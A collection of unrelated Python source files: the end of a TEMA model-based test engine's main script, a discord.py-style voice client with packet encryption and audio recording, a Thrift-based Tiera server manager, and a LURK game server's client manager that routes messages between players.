For example argument string 'port:9090,yellowflag,logger:adapterlog' implies calls setParameter('port',9090), setParameter('yellowflag',None), setParameter('logger',adapterlog_object).""" # TODO: implement special object-type parameters (not needed so far) for argpair in argument_string.split(","): if not argpair: continue if ":" in argpair: name,value=argpair.split(":",1) else: name,value=argpair,None try: object.setParameter(name,int(value)) except Exception,e: if not (isinstance(e,TypeError) or isinstance(e,ValueError)): raise e try: object.setParameter(name,float(value)) except Exception,e: if not (isinstance(e,TypeError) or isinstance(e,ValueError)): raise e object.setParameter(name,value) ### main def main(): try: options=parse_arguments(sys.argv[1:]) except ArgumentError, e: print __doc__ print sys.argv error(e) import_tema_modules(options) # try to optimize try: import psyco psyco.full() except: print "Sadly, there is no Psyco optimization available." # setup logger try: logger=Logger() try: set_parameters(logger,options[ARG_LOGGER_ARGS]) except Exception, e: error("setting up logger arguments failed: '%s'" % e) logger.prepareForRun() # logger seems to be fine. 
Now assign it to every other class logger.listen(InitEngine) logger.listen(Model) logger.listen(Guidance) logger.listen(Adapter) logger.listen(TestData) logger.listen(CoverageRequirement) logger.listen(TestEngine) # if logging of some classes was excluded, add dummy log methods: for cls in [Model, Guidance, Adapter, CoverageRequirement, TestEngine]: if not hasattr(cls,'log'):cls.log = lambda self,message: None except Exception,e: error("setting up logger failed: '%s'" % e) # Initialize test run try: initengine=InitEngine() set_parameters(initengine,options[ARG_INITMODELS]) except Exception, e: error("setting up initmodel failed: '%s'" % e) # setup test model try: model=Model() model.loadFromFile( file(Model.ARG_source_file) ) initial_state=model.getInitialState() except Exception, e: error("setting up test model failed: '%s'" % e) # setup coverage try: covreq=CoverageRequirement( options[ARG_COVERAGE_REQ], model=model ) except Exception, e: error("reading coverage requirement failed: '%s'" % e) # set covreq arguments (if given) if options[ARG_COVERAGE_ARGS]: try: set_parameters(covreq,options[ARG_COVERAGE_ARGS]) except Exception, e: error("setting covreq arguments failed: '%s'" % e) # Output all the action words to the log for debug, benchmarking # etc. purposes. 
model.log("Action words: %s" % (" ".join(model.matchedActions([re.compile(".*:end_aw.*")])))) # setup test data try: testdata=TestData() set_parameters(testdata,options[ARG_DATA]) testdata.prepareForRun() except Exception, e: error("setting up test data failed: '%s'" % e) # setup guidance try: guidance=Guidance() try: set_parameters(guidance,options[ARG_GUIDANCE_ARGS]) except Exception, e: error("setting up guidance arguments failed: '%s'" % e) guidance.setTestModel(model) guidance.addRequirement(covreq) guidance.prepareForRun() except Exception, e: if not isinstance(e,SystemExit): error("setting up guidance failed: '%s'" % e) else: raise e # state verifier if int(options[ARG_VERIFY_STATES]): from tema.guidance.stateverifier import StateVerifier verifier = StateVerifier() else: verifier = None # import action postprocessors import tema.actionpp.actionpp appchain=tema.actionpp.actionpp.ActionPPChain() if options[ARG_ACTIONPP]!="": appmodule=__import__("tema.actionpp."+options[ARG_ACTIONPP],globals(),locals(),['']) logger.listen(appmodule.ActionPP) app=appmodule.ActionPP() set_parameters(app,options[ARG_ACTIONPP_ARGS]) appchain.append(app) # setup adapter try: adapter=Adapter() try: set_parameters(adapter,options[ARG_ADAPTER_ARGS]) except Exception, e: error("setting up adapter arguments failed: '%s'" % e) adapter.prepareForRun() except KeyboardInterrupt: sys.exit(1) except Exception, e: if not isinstance(e,SystemExit): error("setting up adapter failed: '%s'" % e) else: raise e try: initengine.run_init(adapter, testdata, appchain) except Exception, e: error("test run initialization failed: '%s'" % e) # Run! te=TestEngine() te.set_stop_time(options[ARG_STOP_AFTER]) result = "" # Catch exceptions so that logger would close the filehandles and write # buffers to disk. 
try: result=te.run_test(model,initial_state,covreq,testdata,guidance,adapter,appchain,verifier) # We don't want stack trace for normal exit except SystemExit,e: raise # In 2.4, Exception is a base class for all exceptions, but starting with 2.5, BaseException is a base class. # KeyboardInterrupt is inherited from BaseException in 2.5, but in 2.4 from Exception. except KeyboardInterrupt,e: # print_traceback() sys.exit(1) except Exception,e: # print e print_traceback() sys.exit(1) print "Test ended:",result try: main() except Exception,e: print e sys.exit(1)
voice_client.py
""" The MIT License (MIT) Copyright (c) 2015-present Rapptz Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ """Some documentation to refer to: - Our main web socket (mWS) sends opcode 4 with a guild ID and channel ID. - The mWS receives VOICE_STATE_UPDATE and VOICE_SERVER_UPDATE. - We pull the session_id from VOICE_STATE_UPDATE. - We pull the token, endpoint and server_id from VOICE_SERVER_UPDATE. - Then we initiate the voice web socket (vWS) pointing to the endpoint. - We send opcode 0 with the user_id, server_id, session_id and token using the vWS. - The vWS sends back opcode 2 with an ssrc, port, modes(array) and hearbeat_interval. - We send a UDP discovery packet to endpoint:port and receive our IP and our port in LE. - Then we send our IP and port via vWS with opcode 1. - When that's all done, we receive opcode 4 from the vWS. - Finally we can transmit data to endpoint:port. """ import asyncio import socket import logging import struct import threading import select import time from . 
import opus, utils from .backoff import ExponentialBackoff from .gateway import * from .errors import ClientException, ConnectionClosed from .player import AudioPlayer, AudioSource from .sink import Sink, RawData try: import nacl.secret has_nacl = True except ImportError: has_nacl = False __all__ = ( 'VoiceProtocol', 'VoiceClient', ) log = logging.getLogger(__name__) class VoiceProtocol: """A class that represents the Discord voice protocol. This is an abstract class. The library provides a concrete implementation under :class:`VoiceClient`. This class allows you to implement a protocol to allow for an external method of sending voice, such as Lavalink_ or a native library implementation. These classes are passed to :meth:`abc.Connectable.connect`. .. _Lavalink: https://github.com/freyacodes/Lavalink Parameters ------------ client: :class:`Client` The client (or its subclasses) that started the connection request. channel: :class:`abc.Connectable` The voice channel that is being connected to. """ def __init__(self, client, channel): self.client = client self.channel = channel async def on_voice_state_update(self, data): """|coro| An abstract method that is called when the client's voice state has changed. This corresponds to ``VOICE_STATE_UPDATE``. Parameters ------------ data: :class:`dict` The raw `voice state payload`__. .. _voice_state_update_payload: https://discord.com/developers/docs/resources/voice#voice-state-object __ voice_state_update_payload_ """ raise NotImplementedError async def on_voice_server_update(self, data): """|coro| An abstract method that is called when initially connecting to voice. This corresponds to ``VOICE_SERVER_UPDATE``. Parameters ------------ data: :class:`dict` The raw `voice server update payload`__. .. 
_voice_server_update_payload: https://discord.com/developers/docs/topics/gateway#voice-server-update-voice-server-update-event-fields __ voice_server_update_payload_ """ raise NotImplementedError async def connect(self, *, timeout, reconnect): """|coro| An abstract method called when the client initiates the connection request. When a connection is requested initially, the library calls the constructor under ``__init__`` and then calls :meth:`connect`. If :meth:`connect` fails at some point then :meth:`disconnect` is called. Within this method, to start the voice connection flow it is recommended to use :meth:`Guild.change_voice_state` to start the flow. After which, :meth:`on_voice_server_update` and :meth:`on_voice_state_update` will be called. The order that these two are called is unspecified. Parameters ------------ timeout: :class:`float` The timeout for the connection. reconnect: :class:`bool` Whether reconnection is expected. """ raise NotImplementedError async def disconnect(self, *, force): """|coro| An abstract method called when the client terminates the connection. See :meth:`cleanup`. Parameters ------------ force: :class:`bool` Whether the disconnection was forced. """ raise NotImplementedError def cleanup(self): """This method *must* be called to ensure proper clean-up during a disconnect. It is advisable to call this from within :meth:`disconnect` when you are completely done with the voice protocol instance. This method removes it from the internal state cache that keeps track of currently alive voice clients. Failure to clean-up will cause subsequent connections to report that it's still connected. """ key_id, _ = self.channel._get_voice_client_key() self.client._connection._remove_voice_client(key_id) class VoiceClient(VoiceProtocol): """Represents a Discord voice connection. You do not create these, you typically get them from e.g. :meth:`VoiceChannel.connect`. 
Warning -------- In order to use PCM based AudioSources, you must have the opus library installed on your system and loaded through :func:`opus.load_opus`. Otherwise, your AudioSources must be opus encoded (e.g. using :class:`FFmpegOpusAudio`) or the library will not be able to transmit audio. Attributes ----------- session_id: :class:`str` The voice connection session ID. token: :class:`str` The voice connection token. endpoint: :class:`str` The endpoint we are connecting to. channel: :class:`abc.Connectable` The voice channel connected to. loop: :class:`asyncio.AbstractEventLoop` The event loop that the voice client is running on. """ def __init__(self, client, channel): if not has_nacl: raise RuntimeError("PyNaCl library needed in order to use voice") super().__init__(client, channel) state = client._connection self.token = None self.socket = None self.loop = state.loop self._state = state # this will be used in the AudioPlayer thread self._connected = threading.Event() self._handshaking = False self._potentially_reconnecting = False self._voice_state_complete = asyncio.Event() self._voice_server_complete = asyncio.Event() self.mode = None self._connections = 0 self.sequence = 0 self.timestamp = 0 self._runner = None self._player = None self.encoder = None self.decoder = None self._lite_nonce = 0 self.ws = None self.paused = False self.recording = False self.user_timestamps = {} self.sink = None self.starting_time = None self.stopping_time = None warn_nacl = not has_nacl supported_modes = ( 'xsalsa20_poly1305_lite', 'xsalsa20_poly1305_suffix', 'xsalsa20_poly1305', ) @property def guild(self): """Optional[:class:`Guild`]: The guild we're connected to, if applicable.""" return getattr(self.channel, 'guild', None) @property def user(self): """:class:`ClientUser`: The user connected to voice (i.e. 
ourselves).""" return self._state.user def checked_add(self, attr, value, limit): val = getattr(self, attr) if val + value > limit: setattr(self, attr, 0) else: setattr(self, attr, val + value) # connection related async def on_voice_state_update(self, data): self.session_id = data['session_id'] channel_id = data['channel_id'] if not self._handshaking or self._potentially_reconnecting: # If we're done handshaking then we just need to update ourselves # If we're potentially reconnecting due to a 4014, then we need to differentiate # a channel move and an actual force disconnect if channel_id is None: # We're being disconnected so cleanup await self.disconnect() else: guild = self.guild self.channel = channel_id and guild and guild.get_channel(int(channel_id)) else: self._voice_state_complete.set() async def on_voice_server_update(self, data): if self._voice_server_complete.is_set(): log.info('Ignoring extraneous voice server update.') return self.token = data.get('token') self.server_id = int(data['guild_id']) endpoint = data.get('endpoint') if endpoint is None or self.token is None: log.warning('Awaiting endpoint... This requires waiting. 
' \ 'If timeout occurred considering raising the timeout and reconnecting.') return self.endpoint, _, _ = endpoint.rpartition(':') if self.endpoint.startswith('wss://'): # Just in case, strip it off since we're going to add it later self.endpoint = self.endpoint[6:] # This gets set later self.endpoint_ip = None self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.setblocking(False) if not self._handshaking: # If we're not handshaking then we need to terminate our previous connection in the websocket await self.ws.close(4000) return self._voice_server_complete.set() async def voice_connect(self): await self.channel.guild.change_voice_state(channel=self.channel) async def voice_disconnect(self): log.info('The voice handshake is being terminated for Channel ID %s (Guild ID %s)', self.channel.id, self.guild.id) await self.channel.guild.change_voice_state(channel=None) def prepare_handshake(self): self._voice_state_complete.clear() self._voice_server_complete.clear() self._handshaking = True log.info('Starting voice handshake... (connection attempt %d)', self._connections + 1) self._connections += 1 def finish_handshake(self): log.info('Voice handshake complete. Endpoint found %s', self.endpoint) self._handshaking = False self._voice_server_complete.clear() self._voice_state_complete.clear() async def connect_websocket(self): ws = await DiscordVoiceWebSocket.from_client(self) self._connected.clear() while ws.secret_key is None: await ws.poll_event() self._connected.set() return ws async def connect(self, *, reconnect, timeout): log.info('Connecting to voice...') self.timeout = timeout for i in range(5): self.prepare_handshake() # This has to be created before we start the flow. 
futures = [ self._voice_state_complete.wait(), self._voice_server_complete.wait(), ] # Start the connection flow await self.voice_connect() try: await utils.sane_wait_for(futures, timeout=timeout) except asyncio.TimeoutError: await self.disconnect(force=True) raise self.finish_handshake() try: self.ws = await self.connect_websocket() break except (ConnectionClosed, asyncio.TimeoutError): if reconnect: log.exception('Failed to connect to voice... Retrying...') await asyncio.sleep(1 + i * 2.0) await self.voice_disconnect() continue else: raise if self._runner is None: self._runner = self.loop.create_task(self.poll_voice_ws(reconnect)) async def potential_reconnect(self): # Attempt to stop the player thread from playing early self._connected.clear() self.prepare_handshake() self._potentially_reconnecting = True try: # We only care about VOICE_SERVER_UPDATE since VOICE_STATE_UPDATE can come before we get disconnected await asyncio.wait_for(self._voice_server_complete.wait(), timeout=self.timeout) except asyncio.TimeoutError: self._potentially_reconnecting = False await self.disconnect(force=True) return False self.finish_handshake() self._potentially_reconnecting = False try: self.ws = await self.connect_websocket() except (ConnectionClosed, asyncio.TimeoutError): return False else: return True @property def latency(self): """:class:`float`: Latency between a HEARTBEAT and a HEARTBEAT_ACK in seconds. This could be referred to as the Discord Voice WebSocket latency and is an analogue of user's voice latencies as seen in the Discord client. .. versionadded:: 1.4 """ ws = self.ws return float("inf") if not ws else ws.latency @property def average_latency(self): """:class:`float`: Average of most recent 20 HEARTBEAT latencies in seconds. .. 
versionadded:: 1.4 """ ws = self.ws return float("inf") if not ws else ws.average_latency async def poll_voice_ws(self, reconnect): backoff = ExponentialBackoff() while True: try: await self.ws.poll_event() except (ConnectionClosed, asyncio.TimeoutError) as exc: if isinstance(exc, ConnectionClosed): # The following close codes are undocumented so I will document them here. # 1000 - normal closure (obviously) # 4014 - voice channel has been deleted. # 4015 - voice server has crashed if exc.code in (1000, 4015): log.info('Disconnecting from voice normally, close code %d.', exc.code) await self.disconnect() break if exc.code == 4014: log.info('Disconnected from voice by force... potentially reconnecting.') successful = await self.potential_reconnect() if not successful: log.info('Reconnect was unsuccessful, disconnecting from voice normally...') await self.disconnect() break else: continue if not reconnect: await self.disconnect() raise retry = backoff.delay() log.exception('Disconnected from voice... Reconnecting in %.2fs.', retry) self._connected.clear() await asyncio.sleep(retry) await self.voice_disconnect() try: await self.connect(reconnect=True, timeout=self.timeout) except asyncio.TimeoutError: # at this point we've retried 5 times... let's continue the loop. log.warning('Could not connect to voice... Retrying...') continue async def disconnect(self, *, force=False): """|coro| Disconnects this voice client from voice. """ if not force and not self.is_connected(): return self.stop() self._connected.clear() try: if self.ws: await self.ws.close() await self.voice_disconnect() finally: self.cleanup() if self.socket: self.socket.close() async def move_to(self, channel): """|coro| Moves you to a different voice channel. Parameters ----------- channel: :class:`abc.Snowflake` The channel to move to. Must be a voice channel. 
""" await self.channel.guild.change_voice_state(channel=channel) def is_connected(self): """Indicates if the voice client is connected to voice.""" return self._connected.is_set() # audio related def _get_voice_packet(self, data): header = bytearray(12) # Formulate rtp header header[0] = 0x80 header[1] = 0x78 struct.pack_into('>H', header, 2, self.sequence) struct.pack_into('>I', header, 4, self.timestamp) struct.pack_into('>I', header, 8, self.ssrc) encrypt_packet = getattr(self, '_encrypt_' + self.mode) return encrypt_packet(header, data) def _encrypt_xsalsa20_poly1305(self, header, data): box = nacl.secret.SecretBox(bytes(self.secret_key)) nonce = bytearray(24) nonce[:12] = header return header + box.encrypt(bytes(data), bytes(nonce)).ciphertext def _encrypt_xsalsa20_poly1305_suffix(self, header, data): box = nacl.secret.SecretBox(bytes(self.secret_key)) nonce = nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE) return header + box.encrypt(bytes(data), nonce).ciphertext + nonce def _encrypt_xsalsa20_poly1305_lite(self, header, data): box = nacl.secret.SecretBox(bytes(self.secret_key)) nonce = bytearray(24) nonce[:4] = struct.pack('>I', self._lite_nonce) self.checked_add('_lite_nonce', 1, 4294967295) return header + box.encrypt(bytes(data), bytes(nonce)).ciphertext + nonce[:4] def _decrypt_xsalsa20_poly1305(self, header, data): box = nacl.secret.SecretBox(bytes(self.secret_key)) nonce = bytearray(24) nonce[:12] = header return self.strip_header_ext(box.decrypt(bytes(data), bytes(nonce))) def _decrypt_xsalsa20_poly1305_suffix(self, header, data): box = nacl.secret.SecretBox(bytes(self.secret_key)) nonce_size = nacl.secret.SecretBox.NONCE_SIZE nonce = data[-nonce_size:] return self.strip_header_ext(box.decrypt(bytes(data[:-nonce_size]), nonce)) def _decrypt_xsalsa20_poly1305_lite(self, header, data): box = nacl.secret.SecretBox(bytes(self.secret_key)) nonce = bytearray(24) nonce[:4] = data[-4:] data = data[:-4] return self.strip_header_ext(box.decrypt(bytes(data), 
bytes(nonce))) @staticmethod def strip_header_ext(data): if data[0] == 0xbe and data[1] == 0xde and len(data) > 4: _, length = struct.unpack_from('>HH', data) offset = 4 + length * 4 data = data[offset:] return data def get_ssrc(self, user_id): return {info['user_id']: ssrc for ssrc, info in self.ws.ssrc_map.items()}[user_id] def play(self, source, *, after=None): """Plays an :class:`AudioSource`. The finalizer, ``after`` is called after the source has been exhausted or an error occurred. If an error happens while the audio player is running, the exception is caught and the audio player is then stopped. If no after callback is passed, any caught exception will be displayed as if it were raised. Parameters ----------- source: :class:`AudioSource` The audio source we're reading from. after: Callable[[:class:`Exception`], Any] The finalizer that is called after the stream is exhausted. This function must have a single parameter, ``error``, that denotes an optional exception that was raised during playing. Raises ------- ClientException Already playing audio or not connected. TypeError Source is not a :class:`AudioSource` or after is not a callable. OpusNotLoaded Source is not opus encoded and opus is not loaded. 
""" if not self.is_connected(): raise ClientException('Not connected to voice.') if self.is_playing(): raise ClientException('Already playing audio.') if not isinstance(source, AudioSource): raise TypeError(f'source must an AudioSource not {source.__class__.__name__}') if not self.encoder and not source.is_opus(): self.encoder = opus.Encoder() self._player = AudioPlayer(source, self, after=after) self._player.start() def is_playing(self): """Indicates if we're currently playing audio.""" return self._player is not None and self._player.is_playing() def is_paused(self): """Indicates if we're playing audio, but if we're paused.""" return self._player is not None and self._player.is_paused() def stop(self): """Stops playing audio.""" if self._player: self._player.stop() self._player = None def pause(self): """Pauses the audio playing.""" if self._player: self._player.pause() def resume(self): """Resumes the audio playing.""" if self._player: self._player.resume() @property def source(self): """Optional[:class:`AudioSource`]: The audio source being played, if playing. This property can also be used to change the audio source currently being played. """ return self._player.source if self._player else None @source.setter def source(self, value): if not isinstance(value, AudioSource): raise TypeError(f'expected AudioSource not {value.__class__.__name__}.') if self._player is None: raise ValueError('Not playing anything.') self._player._set_source(value) def send_audio_packet(self, data, *, encode=True): """Sends an audio packet composed of the data. You must be connected to play audio. Parameters ---------- data: :class:`bytes` The :term:`py:bytes-like object` denoting PCM or Opus voice data. encode: :class:`bool` Indicates if ``data`` should be encoded into Opus. Raises ------- ClientException You are not connected. opus.OpusError Encoding the data failed. 
""" self.checked_add('sequence', 1, 65535) if encode: encoded_data = self.encoder.encode(data, self.encoder.SAMPLES_PER_FRAME) else: encoded_data = data packet = self._get_voice_packet(encoded_data) try: self.socket.sendto(packet, (self.endpoint_ip, self.voice_port)) except BlockingIOError: log.warning('A packet has been dropped (seq: %s, timestamp: %s)', self.sequence, self.timestamp) self.checked_add('timestamp', opus.Encoder.SAMPLES_PER_FRAME, 4294967295) def unpack_audio(self, data): """Takes an audio packet received from Discord and decodes it into pcm audio data. If there are no users talking the channel, `None` will be returned You must be connected to receive audio. Parameters --------- data: :class:`bytes` Bytes received by Discord via the UDP connection used for sending and receiving voice data """ if 200 <= data[1] <= 204: # RTCP received. # RTCP provides information about the connection # as opposed to actual audio data, so it's not # important at the moment. return if self.paused: return data = RawData(data, self) if data.decrypted_data == b'\xf8\xff\xfe': # Frame of silence return self.decoder.decode(data) def start_recording(self, sink, callback, *args): """The bot will begin recording audio from the current voice channel it is in. This function uses a thread so the current code line will not be stopped. Must be in a voice channel to use. Must not be already recording. Parameters ---------- sink: :class:`Sink` A Sink which will "store" all the audio data callback: :class:`asynchronous function` A function which is called after the bot has stopped recording. *args: Args which will be passed to the callback function. Raises ------ ClientException Not connected to a voice channel. ClientException Already recording. ClientException Must provide a Sink object. 
""" if not self.is_connected(): raise ClientException('Not connected to voice channel.') if self.recording: raise ClientException("Already recording.") if not isinstance(sink, Sink): raise ClientException("Must provide a Sink object.") self.empty_socket() self.decoder = opus.DecodeManager(self) self.decoder.start() self.recording = True self.sink = sink sink.init(self) t = threading.Thread(target=self.recv_audio, args=(sink, callback, *args,)) t.start() def stop_recording(self): """Stops the recording. Must be already recording. Raises ------ ClientException Not currently recording. """ if not self.recording: raise ClientException("Not currently recording audio.") self.decoder.stop() self.recording = False self.paused = False def pause_recording(self): """Pauses or unpauses the recording. Must be already recording. Raises ------ ClientException Not currently recording. """ if not self.recording: raise ClientException("Not currently recording audio.") self.paused = {True: False, False: True}[self.paused] def empty_socket(self): while True: ready, _, _ = select.select([self.socket], [], [], 0.0) if len(ready) == 0: break for s in ready: s.recv(4096) def recv_audio(self, sink, callback, *args): # Gets data from _recv_audio and sorts # it by user, handles pcm files and # silence that should be added. 
self.user_timestamps = {} self.starting_time = time.perf_counter() while self.recording: ready, _, err = select.select([self.socket], [], [self.socket], 0.01) if not ready: if err: print("Socket error") continue try: data = self.socket.recv(4096) except OSError: self.stop_recording() continue self.unpack_audio(data) self.stopping_time = time.perf_counter() self.sink.cleanup() try: callback = asyncio.run_coroutine_threadsafe(callback(self.sink, *args), self.loop) result = callback.result() except Exception as exc: raise exc else: if result is not None: print(result) def ssrc_exists(self, ssrc): return ssrc in self.ws.ssrc_map def recv_decoded_audio(self, data): if data.ssrc not in self.user_timestamps: self.user_timestamps.update({data.ssrc: data.timestamp}) # Add silence of when they were not being recorded. #data.decoded_data = struct.pack('<h', 0) * round(self.decoder.CHANNELS * self.decoder.SAMPLING_RATE * (time.perf_counter() - self.starting_time)) + data.decoded_data else: self.user_timestamps[data.ssrc] = data.timestamp silence = data.timestamp - self.user_timestamps[data.ssrc] - 960 data.decoded_data = struct.pack('<h', 0) * silence + data.decoded_data #if not self.ssrc_exists(data.ssrc): # threading.Condition().wait_for(lambda: self.ssrc_exists(data.ssrc)) while not self.ssrc_exists(data.ssrc): time.sleep(0.2) self.sink.write(data.decoded_data, self.ws.ssrc_map[data.ssrc]['user_id'])
tieraServerManager.py
import commands import threading import socket import time import sys import json import select sys.path.append('./gen-py') from WieraTieraServerIface import * from WieraTieraServerIface.ttypes import * from thrift.transport import TSocket from thrift.transport import TTransport from thrift.protocol import TBinaryProtocol from thrift.server import TServer from TieraServerWieraIface import * from TieraServerWieraIface.ttypes import * class DCsMonitor: #this info will come from Tiera Server #this moudle will agreegate information which will be used for PGA #this will be updsed by Tiera Server update_thread = None def __init__(self, tiera_server_manager): self.tiera_server_manager = tiera_server_manager self.update_thread = threading.Thread(target=self._update, args=[5, ]) self.update_thread.daemon = True self.update_thread.start() def _update(self, ping_interval): while True: server_list = self.tiera_server_manager.get_tiera_server_list() for server_info in server_list: hostname = server_info[0] tiera_server_client, port = self.tiera_server_manager.get_tiera_server_client(hostname, 0) # print tiera_server_client try: if tiera_server_client != None: piggy_back_info = tiera_server_client.ping() req_json = json.loads(piggy_back_info) # print req_json #update info self.tiera_server_manager.update_server_info(hostname, port, req_json) except Exception, e: print 'TSM: Ping to Tiera Server ' + hostname + ':' + str(port) + ' has been failed.' 
self.remove_tiera_server(hostname, port) time.sleep(ping_interval) outdated_server_list = self.tiera_server_manager.check_latest_updated_time() # if len(outdated_server_list) > 0: # print 'TSM: These servers are outdated :' + str(outdated_server_list) class WieraTieraServerHandler: def __init__(self, tiera_server_manager): self.tiera_server_manager = tiera_server_manager def registerTieraServer(self, server_info, callback_ip): tiera_info = json.loads(server_info) result = {} try: self.tiera_server_manager.lock.acquire() if tiera_info != None: hostname = tiera_info['hostname'] if 'ip' not in tiera_info: ip = callback_ip.strip('::ffff:') print ip + ' from callback_ip from thrift' else: ip = tiera_info['ip'] port = tiera_info['tiera_server_port'] self.tiera_server_manager.add_tiera_server(hostname, ip, port) result['result'] = True result['value'] = 'Add Tiera info into the list successfully' print '[TSM] '+ hostname + '(' + ip + ':' + str(port) +') is registered.' else: result['result'] = False result['value'] = 'Failed to load request to json' finally: self.tiera_server_manager.lock.release() return json.dumps(result) class TieraServerManager: def __init__(self, port, ping_interval): self.server_list = {} self.wiera_server_manager_port = port self.lock = threading.Lock() #run server for Tiera Server # self.wiera_tiera_server = threading.Thread(target=self._run_tiera_server, args=([port,])) # self.wiera_tiera_server.daemon = True # self.wiera_tiera_server.start() self.ping_interval = ping_interval #set ping thread # self.DCsMonitor = DCsMonitor(self) def add_tiera_server(self, hostname, ip, port): if hostname not in self.server_list: self.server_list[hostname] = {} self.server_list[hostname]['ip'] = ip self.server_list[hostname]['ports'] = {} if port in self.server_list[hostname]['ports']: self.server_list[hostname]['ports'][port].close() transport = TSocket.TSocket(ip, port) transport = TTransport.TFramedTransport(transport) protocol = 
TBinaryProtocol.TBinaryProtocol(transport) client = TieraServerWieraIface.Client(protocol) # Connect! transport.open() self.server_list[hostname]['ports'][port] = {} self.server_list[hostname]['ports'][port]['update_time'] = time.time() self.server_list[hostname]['ports'][port]['thrift_client'] = client self.server_list[hostname]['ports'][port]['aggregated'] = {} # self.server_list[hostname]['ports'][port]['aggregated']['latency'] = {} # self.server_list[hostname]['ports'][port]['aggregated']['bandwidth'] = {} #will store get and put history and latency for each request # self.server_list[hostname]['ports'][port]['aggregated']['workload'] = {} def get_tiera_server_client(self, hostname, port): if hostname in self.server_list: if port in self.server_list[hostname]['ports']: return (self.server_list[hostname]['ports'][port]['thrift_client'], port) else: for port in self.server_list[hostname]['ports']: return (self.server_list[hostname]['ports'][port]['thrift_client'], port) return None def run_forever(self): # set handler to our implementation handler = WieraTieraServerHandler(self) processor = WieraTieraServerIface.Processor(handler) transport = TSocket.TServerSocket(port=self.wiera_server_manager_port) tfactory = TTransport.TFramedTransportFactory() pfactory = TBinaryProtocol.TBinaryProtocolFactory() # set server server = TServer.TThreadPoolServer(processor, transport, tfactory, pfactory, daemon=True) #set socket thread 20 min server.setNumThreads(32) print '[TSM] Tiera Server Manager is ready for Tiera Server port:' + str(self.wiera_server_manager_port) server.serve() def check_latest_updated_time(self): outdated_server = [] for hostname in self.server_list: for port in self.server_list[hostname]['ports']: latest = self.server_list[hostname]['ports'][port]['update_time'] elapse = time.time() - latest if elapse > self.ping_interval+1: outdated_server.append((hostname, port)) return outdated_server def update_server_info(self, hostname, port, server_info): 
self.server_list[hostname]['ports'][port]['aggregated'] = server_info self.server_list[hostname]['ports'][port]['update_time'] = time.time() def find_info_by_hostname(self, hostname): if hostname in self.server_list: ip = self.server_list[hostname]['ip'] for port in self.server_list[hostname]['ports']: return ip, port return None, None def remove_tiera_server(self, hostname, port): if port in self.server_list[hostname]['ports']: del self.server_list[hostname]['ports'][port] def get_tiera_server_list(self): #return as a list server_list = [] for hostname in self.server_list: ip = self.server_list[hostname]['ip'] server_info = (hostname, ip) server_list.append(server_info) return server_list def get_tiera_server(self, hostname): if hostname not in self.server_list: return None return self.server_list[hostname]
client_manager.py
from LURKconfig import game_settings
from client import Client, Q
from LURKp import LURKprot
from models import Session, Player, Character, Room, Connection
from math import ceil
import threading, time
import multiprocessing.dummy as mp


class ClientManager:
    ### Uses a threaded loop to relay messages between Clients ###
    # Owns the router queue that all Clients publish (name, message) pairs
    # to, and per-player send queues the router delivers into.

    def __init__(self):
        self.game_settings = game_settings
        self.lurk = LURKprot()
        self.players = {} # TODO: won't track players, only new conns until they start in their own process.
        # Shared inbound queue; message_loop() drains it forever.
        self.router_queue = mp.Queue()
        self.thread = threading.Thread(target = self.message_loop)
        self.thread.start()

    def route_message(self, message):
        # Deliver one (name, message_dict) pair to the named player's
        # send queue; unknown names are logged and dropped.
        name, message_dict = message
        if name in self.players:
            self.players[name].send_queue.put(message_dict)
        else:
            print(f'Player Route Error: {name} not found')

    def message_loop(self):
        # Router thread body: blocks on router_queue and relays each message.
        while True:
            message = self.router_queue.get()
            self.route_message(message)

    def greet_conn(self, conn):
        # Send the LURK version message followed by the game-info message
        # to a freshly accepted connection.
        lurk_version = self.lurk.get_version_message()
        self.lurk.encode(lurk_version, conn = conn)
        greeting = self.lurk.get_game_message(self.game_settings['initial_points'], self.game_settings['stat_limit'], self.game_settings['greeting'])
        self.lurk.encode(greeting, conn = conn)

    def spawn_client(self, conn, router_queue, character):
        # Start a Client in a dummy (thread-backed) process and return the
        # queue the router should use to send to it.
        send_queue = Q()
        p = mp.Process(target = Client, args = (conn, router_queue, send_queue, character))
        p.start()
        return send_queue

    def approve_conn(self, conn):
        ### Checks availability of name or innactive Player object, creates/updates Player or responds with error message ###
        # Expects a CHARACTER message (type 10); validates the stat total
        # before spawning a Client for the connection. Returns True on
        # acceptance, False otherwise.
        message_dict = self.lurk.decode(conn = conn)
        if message_dict and 'type' in message_dict and message_dict['type'] == 10:
            name = message_dict['name']
            # print(f'Approval pending for: {name}')
            stats_total = message_dict['attack'] + message_dict['defense'] + message_dict['regen']
            if stats_total == self.game_settings['initial_points']: # TODO: This block should be moved into Game
                if name in self.players:
                    print("Attempting to resurrect")
                    if self.resurrect_player(conn, message_dict):
                        self.players[name] = self.spawn_client(conn, self.router_queue, message_dict)
                        return True
                else:
                    print(f'Adding new player: {name}')
                    self.players[name] = self.spawn_client(conn, self.router_queue, message_dict)
                    # self.game_queue.put((name, message_dict))
                    return True
            else:
                print(f"Rejecting character stats for {name}")
                text = f"Attack, defense, and regen must total {self.game_settings['initial_points']}"
                error_message = self.lurk.get_err_message(4, text = text)
                self.lurk.encode(error_message, conn = conn)
        return False

    def resurrect_player(self, conn, character_dict):
        # Re-attach a reconnecting client to an existing player slot when
        # the old socket is dead; reject the new conn if it is still alive.
        # NOTE(review): self.players[name] holds the queue returned by
        # spawn_client(), but .conn / .new_thread() are used here as if it
        # were a player object — confirm which type is actually stored.
        name = character_dict['name']
        try:
            self.players[name].conn.send(bytes(1)) # attempt writing to the socket to see if it's alive
        except:
            print('Found existing player with broken conn, replacing conn...')
            self.players[name].new_thread(conn)
